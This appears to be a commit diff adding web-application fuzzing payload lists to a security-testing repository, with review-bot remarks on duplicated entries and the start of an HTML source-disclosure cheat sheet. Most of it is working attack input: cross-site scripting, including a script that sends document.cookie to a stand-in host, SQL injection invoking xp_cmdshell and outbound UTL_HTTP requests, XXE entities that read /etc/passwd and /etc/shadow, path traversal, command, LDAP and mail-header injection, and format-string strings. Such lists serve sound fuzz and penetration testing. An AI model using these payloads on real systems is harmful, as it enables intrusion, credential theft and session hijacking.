||||
< script > < / script>
|
||||
%0a
|
||||
%00
|
||||
+%00
|
||||
\0
|
||||
\0\0
|
||||
\0\0\0
|
||||
\00
|
||||
\00\00
|
||||
\00\00\00
|
||||
$null
|
||||
$NULL
|
||||
`dir`
|
||||
\nnetstat -a%\n
|
||||
\"blah
|
||||
|dir|
|
||||
";id"
|
||||
dir%00
|
||||
dir%00|
|
||||
|dir
|
||||
|dir|
|
||||
|/bin/ls -al
|
||||
?x=
|
||||
?x="
|
||||
?x=|
|
||||
?x=>
|
||||
/boot.ini
|
||||
ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
|
||||
../../boot.ini
|
||||
/../../../../../../../../%2A
|
||||
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
|
||||
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
|
||||
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
|
||||
../../../../../../../../conf/server.xml
|
||||
C:/inetpub/wwwroot/global.asa
|
||||
C:\inetpub\wwwroot\global.asa
|
||||
C:/boot.ini
|
||||
C:\boot.ini
|
||||
../../../../../../../../../../../../localstart.asp%00
|
||||
../../../../../../../../../../../../localstart.asp
|
||||
../../../../../../../../../../../../boot.ini%00
|
||||
../../../../../../../../../../../../boot.ini
|
||||
/./././././././././././boot.ini
|
||||
/../../../../../../../../../../../boot.ini%00
|
||||
/../../../../../../../../../../../boot.ini
|
||||
/..\../..\../..\../..\../..\../..\../boot.ini
|
||||
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
|
||||
\..\..\..\..\..\..\..\..\..\..\boot.ini
|
||||
..\..\..\..\..\..\..\..\..\..\boot.ini%00
|
||||
..\..\..\..\..\..\..\..\..\..\boot.ini
|
||||
/../../../../../../../../../../../boot.ini%00.html
|
||||
/../../../../../../../../../../../boot.ini%00.jpg
|
||||
/.../.../.../.../.../
|
||||
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
|
||||
%0d%0aX-Injection-Header:%20AttackValue
|
||||
!@#0%^#0##018387@#0^^**(()
|
||||
%01%02%03%04%0a%0d%0aADSF
|
||||
/,%ENV,/
|
||||
<!--#exec%20cmd="dir"-->
|
||||
<!--#exec%20cmd="dir"-->
|
||||
%
|
||||
#
|
||||
*
|
||||
}
|
||||
;
|
||||
/
|
||||
\
|
||||
\\
|
||||
\\/
|
||||
\\\\*
|
||||
\\\\?\\
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<<
|
||||
<<<
|
||||
|
|
||||
||
|
||||
`
|
||||
-
|
||||
--
|
||||
*|
|
||||
^'
|
||||
\'
|
||||
/'
|
||||
@'
|
||||
(')
|
||||
{'}
|
||||
[']
|
||||
*'
|
||||
#'
|
||||
!'
|
||||
!@#$%%^#$%#$@#$%$$@#$%^^**(()
|
||||
%01%02%03%04%0a%0d%0aADSF
|
||||
\t
|
||||
"\t"
|
||||
|
||||
|
||||
|
||||
|
||||
#xD
|
||||
#xA
|
||||
#xD#xA
|
||||
#xA#xD
|
||||
/%00/
|
||||
%00/
|
||||
%00
|
||||
<?
|
||||
%3C
|
||||
%3C%3F
|
||||
%60
|
||||
%5C
|
||||
%5C/
|
||||
%7C
|
||||
%00
|
||||
/%2A
|
||||
%2A
|
||||
%2C
|
||||
%20
|
||||
%20|
|
||||
%250a
|
||||
%2500
|
||||
../
|
||||
%2e%2e%2f
|
||||
..%u2215
|
||||
..%c0%af
|
||||
..%bg%qf
|
||||
..\
|
||||
..%5c
|
||||
..%%35c
|
||||
..%255c
|
||||
..%%35%63
|
||||
..%25%35%63
|
||||
..%u2216
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
\x3c
|
||||
\x3C
|
||||
\u003c
|
||||
\u003C
|
||||
something%00html
|
||||
'
|
||||
/'
|
||||
\'
|
||||
^'
|
||||
@'
|
||||
{'}
|
||||
[']
|
||||
*'
|
||||
#'
|
||||
">xxx<P>yyy
|
||||
"><script>"
|
||||
<script>alert("XSS")</script>
|
||||
<<script>alert("XSS");//<</script>
|
||||
<script>alert(document.cookie)</script>
|
||||
'><script>alert(document.cookie)</script>
|
||||
'><script>alert(document.cookie);</script>
|
||||
\";alert('XSS');//
|
||||
%3cscript%3ealert("XSS");%3c/script%3e
|
||||
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
|
||||
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
|
||||
<script>alert(document.cookie);</script>
|
||||
<script>alert(document.cookie);<script>alert
|
||||
<xss><script>alert('XSS')</script></vulnerable>
|
||||
<IMG%20SRC='javascript:alert(document.cookie)'>
|
||||
<IMG SRC="javascript:alert('XSS');">
|
||||
<IMG SRC="javascript:alert('XSS')"
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
||||
<IMG SRC=javascript:alert("XSS")>
|
||||
<IMG SRC=`javascript:alert("'XSS'")`>
|
||||
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
||||
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||||
<IMG%20SRC='javasc ript:alert(document.cookie)'>
|
||||
<IMG SRC="jav ascript:alert('XSS');">
|
||||
<IMG SRC="jav	ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="  javascript:alert('XSS');">
|
||||
<IMG DYNSRC="javascript:alert('XSS')">
|
||||
<IMG LOWSRC="javascript:alert('XSS')">
|
||||
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
|
||||
"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script>
|
||||
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
|
||||
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
|
||||
'';!--"<XSS>=&{()}
|
||||
|
||||
'
|
||||
"
|
||||
#
|
||||
-
|
||||
--
|
||||
' --
|
||||
--';
|
||||
' ;
|
||||
= '
|
||||
= ;
|
||||
= --
|
||||
\x23
|
||||
\x27
|
||||
\x3D \x3B'
|
||||
\x3D \x27
|
||||
\x27\x4F\x52 SELECT *
|
||||
\x27\x6F\x72 SELECT *
|
||||
'or select *
|
||||
admin'--
|
||||
';shutdown--
|
||||
<>"'%;)(&+
|
||||
' or ''='
|
||||
' or 'x'='x
|
||||
" or "x"="x
|
||||
') or ('x'='x
|
||||
0 or 1=1
|
||||
' or 0=0 --
|
||||
" or 0=0 --
|
||||
or 0=0 --
|
||||
' or 0=0 #
|
||||
" or 0=0 #
|
||||
or 0=0 #
|
||||
' or 1=1--
|
||||
" or 1=1--
|
||||
' or '1'='1'--
|
||||
"' or 1 --'"
|
||||
or 1=1--
|
||||
or%201=1
|
||||
or%201=1 --
|
||||
' or 1=1 or ''='
|
||||
" or 1=1 or ""="
|
||||
' or a=a--
|
||||
" or "a"="a
|
||||
') or ('a'='a
|
||||
") or ("a"="a
|
||||
hi" or "a"="a
|
||||
hi" or 1=1 --
|
||||
hi' or 1=1 --
|
||||
hi' or 'a'='a
|
||||
hi') or ('a'='a
|
||||
hi") or ("a"="a
|
||||
'hi' or 'x'='x';
|
||||
@variable
|
||||
,@variable
|
||||
PRINT
|
||||
PRINT @@variable
|
||||
select
|
||||
insert
|
||||
as
|
||||
or
|
||||
procedure
|
||||
limit
|
||||
order by
|
||||
asc
|
||||
desc
|
||||
delete
|
||||
update
|
||||
distinct
|
||||
having
|
||||
truncate
|
||||
replace
|
||||
like
|
||||
handler
|
||||
bfilename
|
||||
' or username like '%
|
||||
' or uname like '%
|
||||
' or userid like '%
|
||||
' or uid like '%
|
||||
' or user like '%
|
||||
exec xp
|
||||
exec sp
|
||||
'; exec master..xp_cmdshell
|
||||
'; exec xp_regread
|
||||
t'exec master..xp_cmdshell 'nslookup www.google.com'--
|
||||
--sp_password
|
||||
\x27UNION SELECT
|
||||
' UNION SELECT
|
||||
' UNION ALL SELECT
|
||||
' or (EXISTS)
|
||||
' (select top 1
|
||||
'||UTL_HTTP.REQUEST
|
||||
1;SELECT%20*
|
||||
to_timestamp_tz
|
||||
tz_offset
|
||||
<>"'%;)(&+
|
||||
'%20or%201=1
|
||||
%27%20or%201=1
|
||||
%20$(sleep%2050)
|
||||
%20'sleep%2050'
|
||||
char%4039%41%2b%40SELECT
|
||||
'%20OR
|
||||
'sqlattempt1
|
||||
(sqlattempt2)
|
||||
|
|
||||
%7C
|
||||
*|
|
||||
%2A%7C
|
||||
*(|(mail=*))
|
||||
%2A%28%7C%28mail%3D%2A%29%29
|
||||
*(|(objectclass=*))
|
||||
%2A%28%7C%28objectclass%3D%2A%29%29
|
||||
(
|
||||
%28
|
||||
)
|
||||
%29
|
||||
&
|
||||
%26
|
||||
!
|
||||
%21
|
||||
' or 1=1 or ''='
|
||||
' or ''='
|
||||
x' or 1=1 or 'x'='y
|
||||
/
|
||||
//
|
||||
//*
|
||||
*/*
|
||||
@*
|
||||
count(/child::node())
|
||||
x' or name()='username' or 'x'='y
|
||||
<name>','')); phpinfo(); exit;/*</name>
|
||||
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
|
||||
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
|
||||
<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
|
||||
<xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
||||
<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
||||
<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
|
||||
|
||||
'
|
||||
'--
|
||||
' or 1=1--
|
||||
1 or 1=1--
|
||||
' or 1 in (@@version)--
|
||||
1 or 1 in (@@version)--
|
||||
'; waitfor delay '0:30:0'--
|
||||
1; waitfor delay '0:30:0'--
|
||||
'||Utl_Http.request('http://<yourservername>') from dual--
|
||||
1||Utl_Http.request('http://<yourservername>') from dual--
|
||||
xsstest
|
||||
xsstest%00"<>'
|
||||
</foo>
|
||||
<foo></foo>
|
||||
))))))))))
|
||||
../../../../../../../../../../boot.ini
|
||||
..\..\..\..\..\..\..\..\..\..\boot.ini
|
||||
../../../../../../../../../../windows/win.ini
|
||||
..\..\..\..\..\..\..\..\..\..\windows\win.ini
|
||||
|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
|
||||
| ping -i 30 127.0.0.1 |
|
||||
| ping -n 30 127.0.0.1 |
|
||||
& ping -i 30 127.0.0.1 &
|
||||
& ping -n 30 127.0.0.1 &
|
||||
; ping 127.0.0.1 ;
|
||||
%0a ping -i 30 127.0.0.1 %0a
|
||||
`ping 127.0.0.1`
|
||||
;echo 111111
|
||||
echo 111111
|
||||
response.write 111111
|
||||
:response.write 111111
|
||||
http://<yourservername>/
|
||||
<youremail>%0aCc:<youremail>
|
||||
<youremail>%0d%0aCc:<youremail>
|
||||
<youremail>%0aBcc:<youremail>
|
||||
<youremail>%0d%0aBcc:<youremail>
|
||||
%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<youremail>%0aDATA%0aFrom:+<youremail>%0aTo:+<youremail>%0aSubject:+tst%0afoo%0a%2e%0a
|
||||
%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+<youremail>%0d%0aRCPT+TO:+<youremail>%0d%0aDATA%0d%0aFrom:+<youremail>%0d%0aTo:+<youremail>%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a
|
||||
# known cross platform source Code, file disclosure attack patterns - append after file or dir path
|
||||
%70
|
||||
.%E2%73%70
|
||||
%2e0
|
||||
%2e
|
||||
.
|
||||
\
|
||||
?*
|
||||
%20
|
||||
%00
|
||||
%2f
|
||||
%5c
|
||||
count(/child::node())
|
||||
x' or name()='username' or 'x'='y
|
||||
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
|
||||
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:/boot.ini"">]><foo>&xxe;</foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/shadow"">]><foo>&xxe;</foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
|
||||
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
|
||||
"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
|
||||
"<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
|
||||
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
|
||||
%00
|
||||
NULL
|
||||
null
|
||||
'
|
||||
"
|
||||
;
|
||||
<!
|
||||
-
|
||||
=
|
||||
+
|
||||
"
|
||||
&
|
||||
!
|
||||
|
|
||||
<
|
||||
>
|
||||
"><script>alert(1)</script>
|
||||
%0d
|
||||
%0a
|
||||
%7f
|
||||
%ff
|
||||
-1
|
||||
other
|
||||
%s%p%x%d
|
||||
%99999999999s
|
||||
%08x
|
||||
%20d
|
||||
%20n
|
||||
%20x
|
||||
%20s
|
||||
%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d
|
||||
%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i
|
||||
%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o
|
||||
%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
|
||||
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
|
||||
%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X
|
||||
%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a
|
||||
%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A
|
||||
%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e
|
||||
%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E
|
||||
%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f
|
||||
%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F
|
||||
%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g
|
||||
%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G
|
||||
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
|
||||
%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
|
||||
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
|
||||
XXXXX.%p
|
||||
XXXXX`perl -e 'print ".%p" x 80'`
|
||||
`perl -e 'print ".%p" x 80'`%n
|
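Review bot: The XML and XPath entries at the end of this file, from `count(/child::node())` through the `xmlns:xss` line, repeat a block that already appears earlier in the same file. The second copy is wrapped in outer double quotes with the inner quotes doubled (`"<?xml version=""1.0"" ...`), which looks like spreadsheet or CSV export quoting rather than intended content. Keep one copy in one quoting style. The `# known cross platform source Code, file disclosure attack patterns` line is a comment in the middle of a data file, and the `<yourservername>` and `<youremail>` placeholders need substitution before use; the file or its README should say that `#` lines are to be skipped and that the placeholders must be filled in by the tester.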
118
attack-payloads/all-attacks/interesting-metacharacters.txt
Normal file
|
@ -0,0 +1,118 @@
|
|||
!'
|
||||
!@#$%%^#$%#$@#$%$$@#$%^^**(()
|
||||
!@#0%^#0##018387@#0^^**(()
|
||||
"><script>"
|
||||
">xxx<P>yyy
|
||||
"\t"
|
||||
#
|
||||
#'
|
||||
#'
|
||||
#xA
|
||||
#xA#xD
|
||||
#xD
|
||||
#xD#xA
|
||||
$NULL
|
||||
$null
|
||||
%
|
||||
%00
|
||||
%00/
|
||||
%01%02%03%04%0a%0d%0aADSF
|
||||
%0a
|
||||
%20
|
||||
%20|
|
||||
%2500
|
||||
%250a
|
||||
%2A
|
||||
%2C
|
||||
%2e%2e%2f
|
||||
%3C%3F
|
||||
%5C
|
||||
%5C/
|
||||
%60
|
||||
%7C
|
||||
|
||||
|
||||
|
||||
|
||||
'
|
||||
";id"
|
||||
(')
|
||||
*
|
||||
*'
|
||||
*'
|
||||
*|
|
||||
+%00
|
||||
-
|
||||
--
|
||||
-1
|
||||
-1.0
|
||||
-2
|
||||
-20
|
||||
-268435455
|
||||
..%%35%63
|
||||
..%%35c
|
||||
..%25%35%63
|
||||
..%255c
|
||||
..%5c
|
||||
..%bg%qf
|
||||
..%c0%af
|
||||
..%u2215
|
||||
..%u2216
|
||||
../
|
||||
..\
|
||||
/
|
||||
/%00/
|
||||
/%2A
|
||||
/'
|
||||
/'
|
||||
0
|
||||
00
|
||||
0xfffffff
|
||||
1
|
||||
1.0
|
||||
2
|
||||
2147483647
|
||||
268435455
|
||||
65536
|
||||
;
|
||||
< script > < / script>
|
||||
<?
|
||||
?x=
|
||||
?x="
|
||||
?x=>
|
||||
?x=|
|
||||
@'
|
||||
@'
|
||||
A
|
||||
ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
|
||||
FALSE
|
||||
NULL
|
||||
TRUE
|
||||
[']
|
||||
[']
|
||||
\
|
||||
\"blah
|
||||
\'
|
||||
\'
|
||||
\0
|
||||
\00
|
||||
\00\00
|
||||
\00\00\00
|
||||
\0\0
|
||||
\0\0\0
|
||||
\\
|
||||
\\/
|
||||
\\\\*
|
||||
\\\\?\\
|
||||
\t
|
||||
^'
|
||||
^'
|
||||
`
|
||||
id%00
|
||||
id%00|
|
||||
null
|
||||
something%00html
|
||||
{'}
|
||||
{'}
|
||||
|
|
||||
}
|
|
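Review bot: Several entries in interesting-metacharacters.txt appear twice on consecutive lines (`#'`, `*'`, `/'`, `@'`, `[']`, `\'`, `^'`, `{'}`), and `NULL`, `null`, `%00` and `-1` duplicate values that are also in the combined list earlier in this commit. If each pair was meant to hold two different characters, the distinction is not visible in the committed text and should be restored; otherwise drop the repeats. The run of empty-looking entries after `%7C` should either be removed or, if they are whitespace or control characters, be documented in a comment, since a reader cannot tell from the file what they contain.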
@ -0,0 +1,11 @@
|
|||
# append after dir name - leave slashes to this file - don't prepend one in your fuzzer
|
||||
/%3f.jsp
|
||||
?M=D
|
||||
/?S=D
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
/cgi-bin/test-cgi?/*
|
||||
/cgi-bin/test-cgi?*
|
||||
/%00/
|
||||
/%2e/
|
||||
/%2f/
|
||||
/%5c/
|
|
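Review bot: The header comment says the entries carry their own slashes, but `?M=D` has no leading slash while its sibling `/?S=D` does; make the two consistent or say in the comment why they differ. The comment is itself the first line of a data file, so the repository should state that lines starting with `#` are to be skipped, otherwise a harness that reads the file line by line will submit the comment as a test value.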
@ -0,0 +1,914 @@
|
|||
<html>
|
||||
|
||||
<head>
|
||||
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
|
||||
<meta name=Generator content="Microsoft Word 10 (filtered)">
|
||||
<title>Source Code, File, and Directory Disclosure Cheat Sheet</title>
|
||||
|
||||
<style>
|
||||
<!--
|
||||
/* Style Definitions */
|
||||
p.MsoNormal, li.MsoNormal, div.MsoNormal
|
||||
{margin:0cm;
|
||||
margin-bottom:.0001pt;
|
||||
font-size:12.0pt;
|
||||
font-family:"Times New Roman";}
|
||||
h2
|
||||
{margin-right:0cm;
|
||||
margin-left:0cm;
|
||||
font-size:18.0pt;
|
||||
font-family:"Times New Roman";
|
||||
color:#354278;}
|
||||
h5
|
||||
{margin-right:0cm;
|
||||
margin-left:0cm;
|
||||
font-size:10.0pt;
|
||||
font-family:"Times New Roman";
|
||||
color:#354278;}
|
||||
a:link, span.MsoHyperlink
|
||||
{color:blue;
|
||||
text-decoration:underline;}
|
||||
a:visited, span.MsoHyperlinkFollowed
|
||||
{color:purple;
|
||||
text-decoration:underline;}
|
||||
p.doctext, li.doctext, div.doctext
|
||||
{margin-right:0cm;
|
||||
margin-left:0cm;
|
||||
font-size:10.5pt;
|
||||
font-family:"Times New Roman";
|
||||
color:black;}
|
||||
span.docemphasis1
|
||||
{font-style:italic;}
|
||||
@page Section1
|
||||
{size:595.3pt 841.9pt;
|
||||
margin:3.0cm 2.0cm 3.0cm 2.0cm;}
|
||||
div.Section1
|
||||
{page:Section1;}
|
||||
-->
|
||||
</style>
|
||||
|
||||
</head>
|
||||
|
||||
<body lang=DA link=blue vlink=purple>
|
||||
|
||||
<div class=Section1>
|
||||
|
||||
<p class=doctext><span lang=EN-GB>This appendix contains a list of all the
|
||||
major source code disclosure techniques discovered over the years. Many of them
|
||||
are specific to particular bugs in particular versions of software. </span>Others
|
||||
are generic across platforms and have been known to reappear contrary to what
|
||||
the vendors say.</p>
|
||||
|
||||
<table class=MsoNormalTable border=1 cellspacing=0 cellpadding=0 width="100%"
|
||||
style='width:100.0%'>
|
||||
<tr>
|
||||
<td colspan=3 style='border:none;padding:.75pt .75pt .75pt .75pt'>
|
||||
<h5 align=center style='text-align:center'><a name=app04table01></a><span
|
||||
style='font-size:10.5pt;font-family:Arial'>Source Code, File, and
|
||||
Directory Disclosure Cheat Sheet</span></h5>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Vulnerable Application</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>HTTP Request</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Vulnerability Information</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Allaire ColdFusion </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
